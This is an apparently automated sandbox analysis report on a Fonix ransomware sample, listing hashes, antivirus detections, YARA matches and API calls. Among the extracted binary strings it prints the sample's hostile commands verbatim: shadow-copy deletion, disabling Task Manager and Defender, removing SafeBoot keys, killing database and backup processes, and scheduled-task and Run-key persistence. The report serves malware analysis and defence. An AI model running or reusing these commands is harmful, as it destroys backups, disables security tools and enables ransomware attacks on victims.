Analysis Report fM498uO16Z

Overview

General Information

Sample Name: fM498uO16Z (renamed file extension from none to exe)
Analysis ID: 338145
MD5: e7f086119362368528a160be01f194ad
SHA1: 996b28ecb4019f0be9fb2400a040bb1ab422235f
SHA256: e3f297dcc0aac80152ba1af99a2c4c101a1ee88759900da7cdfcc9cb5955f06d

Detection

Fonix
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Fonix ransomware
Yara detected Ransomware_Generic
Deletes shadow drive data (may be related to ransomware)
May drop file containing decryption instructions (likely related to ransomware)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query locales information (e.g. system language)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains sections with non-standard names
Program does not show much activity (idle)
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: fM498uO16Z.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: fM498uO16Z.exe Virustotal: Detection: 56%
Source: fM498uO16Z.exe Metadefender: Detection: 22%
Source: fM498uO16Z.exe ReversingLabs: Detection: 55%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011D89D0 CryptReleaseContext,_Init_thread_footer, 0_2_011D89D0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011D8290 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__std_exception_copy, 0_2_011D8290
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011D8AC0 CryptGenRandom,CryptReleaseContext, 0_2_011D8AC0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011D8400 GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,CryptReleaseContext, 0_2_011D8400
Source: fM498uO16Z.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\~Ransomware\Fonix - 4.3.2\x64\Release\Fonix.pdb source: fM498uO16Z.exe
Source: fM498uO16Z.exe String found in binary or memory: https://code.jquery.com/jquery-latest.js
Source: fM498uO16Z.exe String found in binary or memory: https://uupload.ir/files/g510_windows_10.gif
Source: fM498uO16Z.exe String found in binary or memory: https://www.who.int

Spam, unwanted Advertisements and Ransom Demands:

Yara detected Fonix ransomware
Source: Yara match File source: fM498uO16Z.exe, type: SAMPLE
Source: Yara match File source: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fM498uO16Z.exe PID: 1068, type: MEMORY
Source: Yara match File source: 0.2.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE
Yara detected Ransomware_Generic
Source: Yara match File source: fM498uO16Z.exe, type: SAMPLE
Source: Yara match File source: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: fM498uO16Z.exe PID: 1068, type: MEMORY
Source: Yara match File source: 0.2.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE
Deletes shadow drive data (may be related to ransomware)
Source: fM498uO16Z.exe, 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp Binary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet
Source: fM498uO16Z.exe Binary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet
May drop file containing decryption instructions (likely related to ransomware)
Source: fM498uO16Z.exe, 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp Binary or memory string: How To Decrypt Files.hta\Help.txt
Source: fM498uO16Z.exe Binary or memory string: How To Decrypt Files.hta\Help.txt

System Summary:

Detected potential crypto function
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_0122F14C 0_2_0122F14C
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011B31B0 0_2_011B31B0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_0122F9E4 0_2_0122F9E4
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_012289F8 0_2_012289F8
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_0121F880 0_2_0121F880
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_01229888 0_2_01229888
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_0118E0E0 0_2_0118E0E0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011B1B40 0_2_011B1B40
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_0121F394 0_2_0121F394
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_0123A3FC 0_2_0123A3FC
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_0118CAD0 0_2_0118CAD0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_01186D20 0_2_01186D20
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_01195D40 0_2_01195D40
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011D9590 0_2_011D9590
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011813F0 0_2_011813F0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_0122DD94 0_2_0122DD94
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011B4DD0 0_2_011B4DD0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_01226400 0_2_01226400
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_012154A4 0_2_012154A4
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_01221CAC 0_2_01221CAC
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011884A0 0_2_011884A0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_01185CD0 0_2_01185CD0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_01190F80 0_2_01190F80
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_01225784 0_2_01225784
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011B27D0 0_2_011B27D0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_0121F618 0_2_0121F618
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011B4650 0_2_011B4650
Source: classification engine Classification label: mal84.rans.evad.winEXE@1/0@0/0
Source: fM498uO16Z.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: fM498uO16Z.exe Virustotal: Detection: 56%
Source: fM498uO16Z.exe Metadefender: Detection: 22%
Source: fM498uO16Z.exe ReversingLabs: Detection: 55%
Source: fM498uO16Z.exe Static file information: File size 1266688 > 1048576
Source: fM498uO16Z.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\~Ransomware\Fonix - 4.3.2\x64\Release\Fonix.pdb source: fM498uO16Z.exe

Data Obfuscation:

PE file contains sections with non-standard names
Source: fM498uO16Z.exe Static PE information: section name: _RDATA
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_01189877 push rbp; iretd 0_2_01189878

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011F10F0 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_011F10F0

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: fM498uO16Z.exe Binary or memory string: OUTPUT ERROR ::::].FONIXZIP FILECOPY TO PATH \CPUB.KEYREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V DISABLETASKMGR /T REG_DWORD /D 1 /FREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER" /V DISABLEANTISPYWARE /T REG_DWORD /D 1 /FREG DELETE HKEY_CURRENT_USER\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /FREG DELETE HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /FSTART CMD.EXE /C ICACLS * /GRANT EVERYONE:(OI)(CI)F /T /C /QSTART CMD.EXE /C TASKKILL /T /F /IM SQL* && TASKKILL /F /T /IM VEEAM* && TASKKILL /F /T /IM MSEXCHANGE* && TASKKILL /F /T /IM MICROSOFT.EXCHANGE* && TASKKILL /F /T /IM PVX* && TASKKILL /F /T /IM DBSRV* && EXITSTART UP ATTRIB +H +S "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"SCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /RU SYSTEM /RL HIGHEST /FCOPY C:\PROGRAMDATA\XINOF.EXE "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"COPY C:\PROGRAMDATA\XINOF.EXE "C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXEXINOF.EXESCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FFLAG C:\PROGRAMDATA\NONSNONSFLAGBLACK LIST 
MMS.EXESCHEDUL2.EXESCHEDHELP.EXETIB_MOUNTER_MONITOR.EXESQLIOSIM.EXESQLAGENT.EXESQLMAINT.EXESQLSTUBSS.EXECSRSS.EXESQLCEIP.EXEMSTSC.EXETASKMGR.EXESQLSERVR.EXEQBIDPSERVICE.EXESQLSERVER.EXEMSFTESQL.EXESQLAGENT.EXESQLBROWSER.EXESQLWRITER.EXEORACLE.EXEOCSSD.EXEDBSNMP.EXESYNCTIME.EXEMYDESKTOPQOS.EXEAGNTSVC.EXEISQLPPLUSSVC.EXEISQLPUSSVC.EXEXFSSVCCON.EXEMYDESKTOPSERVICE.EXEOCAUTOUPDS.EXEENCSVC.EXEFIREFOXCONFIG.EXETBIRDCONFIG.EXEOCOMM.EXEMYSQLD.EXEMYSQLD-NT.EXEMYSQLD-OPT.EXEDBENG50.EXESQBCORESERVICE.EXEEXCEL.EXEINFOPATH.EXEMSACCESS.EXEMSPUB.EXEONENOTE.EXEOUTLOOK.EXEPOWERPNT.EXESTREAM.EXETHEBAT.EXETHEBAT64.EXETHUNDERBIRD.EXEVISIO.EXEWINWORD.EXEWORDPAD.EXENOTEPAD.EXEPAINT.EXENOTEPAD++.EXEENDNOTE.EXEVMWAREUSER.EXEVMWARESERVICE.EXEVBOXSERVICE.EXEVBOXTRAY.EXESANDBOXIEDCOMLAUNCH.EXEPROCMON.EXEREGMON.EXEFILEMON.EXEWIRESHARK.EXENETMON.EXEVMTOOLSD.EXENTOSKRNL.EXESSMS.EXECBSERVICE.EXEHTTPD.EXEJUSCHED.EXEJUCHECK.EXEJAVAW.EXEJAVA.EXEIPTRAY.EXEIPERIUS.EXEFILEZILLA.EXEDATACOLLECTORSVC.EXEEDGETRANSPORT.EXESTORE.EXEACROTRAY.EXEAGENT.EXESAGECSCLIENT.EXEWSUSSERVICE.EXESLACK.EXENODE.EXEW3WP.EXEMYSQL.EXEMSMDSRV.EXEMSDTSSRVR.EXEFDLAUNCHER.EXEFDHOST.EXEREPORTINGS
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: fM498uO16Z.exe Binary or memory string: Output error ::::].FONIXzip filecopy to path \Cpub.keyreg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /freg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /freg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /Freg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /Fstart cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Qstart cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exitstart up attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /RU SYSTEM /RL HIGHEST /Fcopy C:\ProgramData\XINOF.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"copy C:\ProgramData\XINOF.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exeXINOF.exeschtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /Freg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /freg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /fflag C:\ProgramData\nonsnonsFlagblack list 
mms.exeschedul2.exeschedhelp.exetib_mounter_monitor.exeSQLIOSIM.EXESqlagent.exesqlmaint.exesqlstubss.execsrss.exesqlceip.exemstsc.exetaskmgr.exesqlservr.exeQBIDPService.exesqlserver.exemsftesql.exesqlagent.exesqlbrowser.exesqlwriter.exeoracle.exeocssd.exedbsnmp.exesynctime.exemydesktopqos.exeagntsvc.exeisqlpplussvc.exeisqlpussvc.exexfssvccon.exemydesktopservice.exeocautoupds.exeencsvc.exefirefoxconfig.exetbirdconfig.exeocomm.exemysqld.exemysqld-nt.exemysqld-opt.exedbeng50.exesqbcoreservice.exeexcel.exeinfopath.exemsaccess.exemspub.exeonenote.exeoutlook.exepowerpnt.exestream.exethebat.exethebat64.exeThunderbird.exevisio.exewinword.exewordpad.exenotepad.exepaint.exenotepad++.exeendnote.exevmwareuser.exevmwareservice.exevboxservice.exevboxtray.exeSandboxiedcomlaunch.exeprocmon.exeregmon.exefilemon.exewireshark.exenetmon.exevmtoolsd.exentoskrnl.exeSsms.execbService.exehttpd.exejusched.exejucheck.exejavaw.exejava.exeiptray.exeIperius.exeFileZilla.exeDataCollectorSvc.exeEdgeTransport.exestore.exeacrotray.exeagent.exeSageCSClient.exewsusservice.exeslack.exenode.exew3wp.exemysql.exemsmdsrv.exeMsDtsSrvr.exefdlauncher.exefdhost.exeReportingS

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011F20B8 GetLastError,IsDebuggerPresent,OutputDebugStringW, 0_2_011F20B8
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011F20B8 GetLastError,IsDebuggerPresent,OutputDebugStringW, 0_2_011F20B8
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_012218C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_012218C8
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011F2E0C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_011F2E0C

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: EnumSystemLocalesW, 0_2_012391B4
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_0123989C
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: EnumSystemLocalesW, 0_2_01239284
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: try_get_function,GetLocaleInfoW, 0_2_0122D580
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: EnumSystemLocalesW, 0_2_0122CFB0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 0_2_01238E68
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_012396C0
Source: C:\Users\user\Desktop\fM498uO16Z.exe Code function: 0_2_011F32D0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_011F32D0
Behavior Graph ID: 338145, Sample: fM498uO16Z, Startdate: 11/01/2021, Architecture: WINDOWS, Score: 84. Process started: fM498uO16Z.exe. Signatures shown in graph: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Yara detected Fonix ransomware; 4 other signatures.
No contacted IP infos